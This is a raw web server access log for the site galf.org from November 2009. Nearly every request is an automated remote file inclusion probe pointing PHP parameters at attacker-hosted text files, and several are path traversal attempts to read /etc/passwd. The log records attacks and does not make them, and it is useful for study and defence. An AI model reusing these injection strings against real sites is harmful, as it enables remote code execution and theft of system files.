222.236.47.182 - - [09/Nov/2009:03:15:21 -0800] "GET /logs/access_090504.log%20%20//content/multithumb/multithumb.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.117.58.254 - - [09/Nov/2009:03:16:12 -0800] "GET /logs/error.php?dir=http://216.12.98.59/hdd0/Remote/CSS/License/sysLog/%5Bk%5Dproj3ct/syslog.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
202.117.58.254 - - [09/Nov/2009:03:16:13 -0800] "GET /error.php?dir=http://216.12.98.59/hdd0/Remote/CSS/License/sysLog/%5Bk%5Dproj3ct/syslog.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
202.117.58.254 - - [09/Nov/2009:03:16:18 -0800] "GET /logs/access_090504.log/error.php?dir=http://216.12.98.59/hdd0/Remote/CSS/License/sysLog/%5Bk%5Dproj3ct/syslog.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
202.117.58.254 - - [09/Nov/2009:03:16:22 -0800] "GET /error.php?dir=http://216.12.98.59/hdd0/Remote/CSS/License/sysLog/%5Bk%5Dproj3ct/syslog.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
202.117.58.254 - - [09/Nov/2009:03:16:23 -0800] "GET /logs/error.php?dir=http://216.12.98.59/hdd0/Remote/CSS/License/sysLog/%5Bk%5Dproj3ct/syslog.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
222.124.202.155 - - [09/Nov/2009:03:29:57 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.817" "www.galf.org"
66.98.134.54 - - [09/Nov/2009:03:31:11 -0800] "GET /logs/access_090518.log/error.php?dir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
93.190.48.203 - - [09/Nov/2009:03:32:00 -0800] "GET /logs/access_091012.log/modify.php?dir_module=http://dwheater.com/bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.190.48.203 - - [09/Nov/2009:03:32:13 -0800] "GET /logs/access_091012.log%20%20/modify.php?dir_module=http://dwheater.com/bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.124.202.155 - - [09/Nov/2009:03:36:31 -0800] "GET /logs/access_090817.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.817" "www.galf.org"
222.124.202.155 - - [09/Nov/2009:03:36:31 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.817" "www.galf.org"
222.124.202.155 - - [09/Nov/2009:03:36:32 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.817" "www.galf.org"
222.124.202.155 - - [09/Nov/2009:03:37:02 -0800] "GET /logs/access_090824.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.817" "www.galf.org"
85.111.12.199 - - [09/Nov/2009:03:37:58 -0800] "GET /logs/access_090622.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://jokoyuma.fileave.com/idsatu.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [09/Nov/2009:03:37:58 -0800] "GET /?_PHPLIB[libdir]=http://jokoyuma.fileave.com/idsatu.txt??? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [09/Nov/2009:03:37:58 -0800] "GET /logs//?_PHPLIB[libdir]=http://jokoyuma.fileave.com/idsatu.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [09/Nov/2009:03:38:14 -0800] "GET /logs/access_090420.log/convert/mvcw.php?vwar_root=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [09/Nov/2009:03:38:40 -0800] "GET /logs/access_090615.log/convert/mvcw.php?vwar_root=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [09/Nov/2009:03:38:53 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:03:39:17 -0800] "GET /logs/access.log/errors.php?error=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:03:39:17 -0800] "GET /errors.php?error=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:03:39:17 -0800] "GET /logs/errors.php?error=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:03:39:23 -0800] "GET /logs/access.log/errors.php?error=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:03:39:23 -0800] "GET /logs/errors.php?error=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [09/Nov/2009:03:40:59 -0800] "GET /modify.php?dir_module=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [09/Nov/2009:03:44:43 -0800] "GET /logs/access_090525.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.227.134.140 - - [09/Nov/2009:03:49:36 -0800] "GET /logs/access_090316.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.onesizefitsall.ca/media/plugins/fx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [09/Nov/2009:03:50:22 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
222.236.47.182 - - [09/Nov/2009:03:50:58 -0800] "GET /logs/access_091012.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.69.199.43 - - [09/Nov/2009:03:51:12 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.galf.org"
119.69.199.43 - - [09/Nov/2009:03:51:12 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.galf.org"
119.69.199.43 - - [09/Nov/2009:03:52:13 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
119.69.199.43 - - [09/Nov/2009:03:52:13 -0800] "GET /logs/access_091012.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
119.69.199.43 - - [09/Nov/2009:03:52:13 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
222.236.47.182 - - [09/Nov/2009:03:52:37 -0800] "GET /logs/access_090824.log/modify.php?dir_module=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.69.199.43 - - [09/Nov/2009:03:52:51 -0800] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.abruzzobooking.it/mambots/tukulid.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
114.4.12.3 - - [09/Nov/2009:03:54:49 -0800] "GET /logs/access_090316.log/components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://www.rmvogue.sk/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.144.247.22 - - [09/Nov/2009:03:58:06 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://194.160.227.34/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [09/Nov/2009:03:58:28 -0800] "GET /logs/access.log/modify.php?dir_module=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.4.12.3 - - [09/Nov/2009:04:01:03 -0800] "GET /logs/access_090907.log/components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://www.rmvogue.sk/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.137.176.69 - - [09/Nov/2009:04:01:11 -0800] "GET /logs/access_090420.log//components/com_flyspray/startdown.php?file=http://www.backkarriere.de/templates/css/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.253.162.29 - - [09/Nov/2009:04:03:50 -0800] "GET /modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.abruzzobooking.it/mambots/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "galf.org"
87.253.162.29 - - [09/Nov/2009:04:03:50 -0800] "GET /logs//modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.abruzzobooking.it/mambots/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "galf.org"
66.98.134.54 - - [09/Nov/2009:04:04:09 -0800] "GET /logs/index.php?redir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
66.98.134.54 - - [09/Nov/2009:04:04:10 -0800] "GET /logs/access_090720.log/index.php?redir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
66.98.134.54 - - [09/Nov/2009:04:04:10 -0800] "GET /index.php?redir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
122.200.64.9 - - [09/Nov/2009:04:04:15 -0800] "GET /logs/access_090615.log//zb41/skin/happycast_category_bluishgreen/ask_password.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.64.9 - - [09/Nov/2009:04:04:15 -0800] "GET /logs//zb41/skin/happycast_category_bluishgreen/ask_password.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.64.9 - - [09/Nov/2009:04:04:16 -0800] "GET /zb41/skin/happycast_category_bluishgreen/ask_password.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.98.134.54 - - [09/Nov/2009:04:04:34 -0800] "GET /logs/access_090406.log/index.php?redir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
222.236.47.182 - - [09/Nov/2009:04:06:40 -0800] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.13.191.76 - - [09/Nov/2009:04:07:01 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
164.125.234.121 - - [09/Nov/2009:04:07:01 -0800] "GET /logs/access_090601.log/mosConfig_absolute_path=http://prety1.fileave.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.125.234.121 - - [09/Nov/2009:04:07:01 -0800] "GET /mosConfig_absolute_path=http://prety1.fileave.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.125.234.121 - - [09/Nov/2009:04:07:01 -0800] "GET /logs/mosConfig_absolute_path=http://prety1.fileave.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.137.176.69 - - [09/Nov/2009:04:07:04 -0800] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.backkarriere.de/templates/css/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.236.47.182 - - [09/Nov/2009:04:07:20 -0800] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.93 - - [09/Nov/2009:04:07:21 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
67.227.134.140 - - [09/Nov/2009:04:08:30 -0800] "GET /logs/access_091012.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.onesizefitsall.ca/media/plugins/fx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.227.134.140 - - [09/Nov/2009:04:08:30 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.onesizefitsall.ca/media/plugins/fx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.227.134.140 - - [09/Nov/2009:04:08:50 -0800] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.onesizefitsall.ca/media/plugins/fx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.149.231.176 - - [09/Nov/2009:04:09:28 -0800] "GET /logs//trans/trans.php?trans=&page=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.149.231.176 - - [09/Nov/2009:04:09:28 -0800] "GET /logs/access.log//trans/trans.php?trans=&page=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.149.231.176 - - [09/Nov/2009:04:09:30 -0800] "GET /trans/trans.php?trans=&page=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.149.231.176 - - [09/Nov/2009:04:09:46 -0800] "GET /logs/access.log//trans/trans.php?trans=&page=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.149.231.176 - - [09/Nov/2009:04:09:46 -0800] "GET /logs//trans/trans.php?trans=&page=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.149.231.176 - - [09/Nov/2009:04:09:46 -0800] "GET /trans/trans.php?trans=&page=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.137.176.69 - - [09/Nov/2009:04:10:07 -0800] "GET /logs/access_090504.log//components/com_flyspray/startdown.php?file=http://www.backkarriere.de/templates/css/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.125.234.121 - - [09/Nov/2009:04:10:14 -0800] "GET /logs/access_090817.log/mosConfig_absolute_path=http://prety1.fileave.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:04:14:52 -0800] "GET /logs/access.log%20%20//wp-pass.php?_wp_http_referer=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:04:14:52 -0800] "GET /wp-pass.php?_wp_http_referer=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:04:14:52 -0800] "GET /logs//wp-pass.php?_wp_http_referer=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:04:14:53 -0800] "GET /wp-pass.php?_wp_http_referer=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:04:14:53 -0800] "GET /logs/access.log%20%20//wp-pass.php?_wp_http_referer=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.17 - - [09/Nov/2009:04:14:53 -0800] "GET /logs//wp-pass.php?_wp_http_referer=http://ib.chungbuk.ac.kr//bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.144.247.22 - - [09/Nov/2009:04:15:04 -0800] "GET /main.php?sayfa=http://194.160.227.34/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.144.247.22 - - [09/Nov/2009:04:15:04 -0800] "GET /logs/access_090608.log//main.php?sayfa=http://194.160.227.34/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.144.247.22 - - [09/Nov/2009:04:15:04 -0800] "GET /logs//main.php?sayfa=http://194.160.227.34/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.93 - - [09/Nov/2009:04:15:33 -0800] "GET /logs/access_091005.log HTTP/1.1" 200 7786947 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
67.227.134.140 - - [09/Nov/2009:04:15:36 -0800] "GET /logs/access_090413.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.onesizefitsall.ca/media/plugins/fx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.144.247.22 - - [09/Nov/2009:04:15:44 -0800] "GET /logs/access_090803.log//main.php?sayfa=http://194.160.227.34/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.227.134.140 - - [09/Nov/2009:04:15:51 -0800] "GET /logs/access_090817.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.onesizefitsall.ca/media/plugins/fx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.144.247.22 - - [09/Nov/2009:04:16:20 -0800] "GET /logs/access_090525.log//main.php?sayfa=http://194.160.227.34/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.144.247.22 - - [09/Nov/2009:04:17:06 -0800] "GET /logs/access_090831.log%20%20//main.php?sayfa=http://194.160.227.34/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.144.247.22 - - [09/Nov/2009:04:17:14 -0800] "GET /logs/access_090608.log%20%20//main.php?sayfa=http://194.160.227.34/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.13.191.76 - - [09/Nov/2009:04:17:16 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
91.192.20.164 - - [09/Nov/2009:04:19:24 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [09/Nov/2009:04:19:24 -0800] "GET /logs/access_090511.log//include/bbs.lib.inc.php?site_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [09/Nov/2009:04:19:24 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.100.181.217 - - [09/Nov/2009:04:19:26 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.100.181.217 - - [09/Nov/2009:04:19:26 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.100.181.217 - - [09/Nov/2009:04:19:26 -0800] "GET /logs/access_090720.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.100.181.217 - - [09/Nov/2009:04:19:36 -0800] "GET /logs/access_090316.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [09/Nov/2009:04:24:00 -0800] "GET /logs/access_090511.log/?view=page&pagename=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [09/Nov/2009:04:24:00 -0800] "GET /logs/?view=page&pagename=http://www.kzk.ru/file/baner.txt?? HTTP/1.0" 200 4926 "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [09/Nov/2009:04:24:00 -0800] "GET /?view=page&pagename=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
195.13.191.76 - - [09/Nov/2009:04:24:05 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
207.150.178.28 - - [09/Nov/2009:04:25:07 -0800] "GET /logs/access_090511.log/?view=page&pagename=http://www.rmvogue.sk/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.150.178.28 - - [09/Nov/2009:04:25:07 -0800] "GET /?view=page&pagename=http://www.rmvogue.sk/baner.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
207.150.178.28 - - [09/Nov/2009:04:25:07 -0800] "GET /logs/?view=page&pagename=http://www.rmvogue.sk/baner.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [09/Nov/2009:04:25:47 -0800] "GET /logs/access_090511.log/?view=page&pagename=http://www.rmvogue.sk/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [09/Nov/2009:04:25:47 -0800] "GET /?view=page&pagename=http://www.rmvogue.sk/baner.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [09/Nov/2009:04:25:47 -0800] "GET /logs/?view=page&pagename=http://www.rmvogue.sk/baner.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
64.6.232.171 - - [09/Nov/2009:04:26:08 -0800] "GET /logs/access_090713.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.6.232.171 - - [09/Nov/2009:04:26:08 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.6.232.171 - - [09/Nov/2009:04:26:08 -0800] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.6.232.171 - - [09/Nov/2009:04:26:20 -0800] "GET /logs/access_090824.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
209.172.33.230 - - [09/Nov/2009:04:26:39 -0800] "GET /logs/access_090511.log%20%20/?view=page&pagename=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.227.134.140 - - [09/Nov/2009:04:27:33 -0800] "GET /logs/access_091012.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.onesizefitsall.ca/media/plugins/fx1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.85.101.11 - - [09/Nov/2009:04:27:53 -0800] "GET /logs/access_090330.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
209.85.101.11 - - [09/Nov/2009:04:27:53 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
209.85.101.11 - - [09/Nov/2009:04:27:54 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
209.85.101.11 - - [09/Nov/2009:04:28:02 -0800] "GET /logs/access_090907.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
207.150.178.28 - - [09/Nov/2009:04:28:34 -0800] "GET /logs/access_090511.log%20%20/?view=page&pagename=http://www.rmvogue.sk/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [09/Nov/2009:04:29:34 -0800] "GET /logs/access_090511.log%20%20/?view=page&pagename=http://www.rmvogue.sk/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.6.232.171 - - [09/Nov/2009:04:29:49 -0800] "GET /logs/access_090406.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
164.125.234.121 - - [09/Nov/2009:04:30:20 -0800] "GET /logs/access_090525.log/mosConfig_absolute_path=http://prety1.fileave.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
